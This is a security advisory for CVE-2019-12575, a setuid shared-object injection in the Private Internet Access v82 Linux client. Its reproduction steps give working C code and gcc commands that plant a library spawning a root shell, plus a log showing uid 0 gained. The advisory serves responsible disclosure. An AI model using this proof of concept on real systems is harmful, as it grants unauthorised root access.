Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
security-research/vulnerabilities/PIA/CVE-2019-12575.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
96 lines (62 sloc)
2.18 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Title: PIA Linux, macOS Privilege Escalation: Shared Object Injection | |
| Author: Rich Mirch | |
| CVE: CVE-2019-12575 | |
| Vendor Advisory: N/A | |
| Description | |
| A vulnerability in the London Trust Media Private Internet Access (PIA) VPN | |
| Client v82 for Linux could allow an authenticated, local attacker to run | |
| arbitrary code with elevated privileges. | |
| The PIA Linux binary root_runner.64 is setuid root. This binary executes | |
| /opt/pia/ruby/64/ruby which in turn attempts to load several libraries under | |
| /tmp/ruby-deploy.old/lib. A local unprivileged user can create a malicious | |
| library under this path to execute arbitrary code as the root user. | |
| CVSS | |
| Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F | |
| Base: 7.8 | |
| Temporal: 7.6 | |
| Test Environment | |
| OS: Ubuntu 18.04.1 LTS | |
| Kernel: 4.15.0-29-generic | |
| PIA Version: v82 | |
| Steps to reproduce | |
| All steps are executed as a low privileged user. | |
| Step 1 - Create the following directory | |
| mkdir -p /tmp/ruby-deploy/lib/ruby/2.4.0/enc | |
| Step 2 - Create woot.c to execute a shell when loaded | |
| cat >woot.c<<EOF | |
| #include <stdlib.h> | |
| #include <sys/types.h> | |
| #include <unistd.h> | |
| void woot(){ | |
| setreuid(0,0); | |
| execl("/bin/sh","/bin/sh",NULL); | |
| } | |
| EOF | |
| Step 3 - compile the malicious library. | |
| gcc -fPIC -o woot.o -Wall -c woot.c | |
| gcc -Wall \ | |
| -shared \ | |
| -Wl,-soname,encdb.so.so \ | |
| -Wl,-init,woot \ | |
| -o /tmp/ruby-deploy/lib/ruby/2.4.0/enc/encdb.so.so woot.o | |
| Step 4 - execute root_runner.64 | |
| /opt/pia/root_runner/root_runner.64 | |
| Example | |
| user1@woot:~$ id | |
| uid=1001(user1) gid=1001(user1) groups=1001(user1) | |
| user1@woot:~$ ./pia-ruby-exploit.sh | |
| + LIBPATH=/tmp/ruby-deploy/lib/ruby/2.4.0/enc | |
| + mkdir -p /tmp/ruby-deploy/lib/ruby/2.4.0/enc | |
| + cat | |
| + gcc -fPIC -o woot.o -Wall -c woot.c | |
| + gcc -Wall -shared -Wl,-soname,encdb.so.so -Wl,-init,woot -o /tmp/ruby-deploy/lib/ruby/2.4.0/enc/encdb.so.so woot.o | |
| + /opt/pia/root_runner/root_runner.64 | |
| # id | |
| uid=0(root) gid=1001(user1) groups=1001(user1) | |
| # | |
| Timeline: | |
| 2018-12-16: Reported to vendor | |
| 2018-12-16: Vendor acknowledged receipt of report | |
| 2019-01-18: Vendor states fix will be available in v83 however this version was never released. | |
| The desktop client was re-written. Upgrade to v1.2.1+ of the new client. | |
| 2019-06-10: Public disclosure |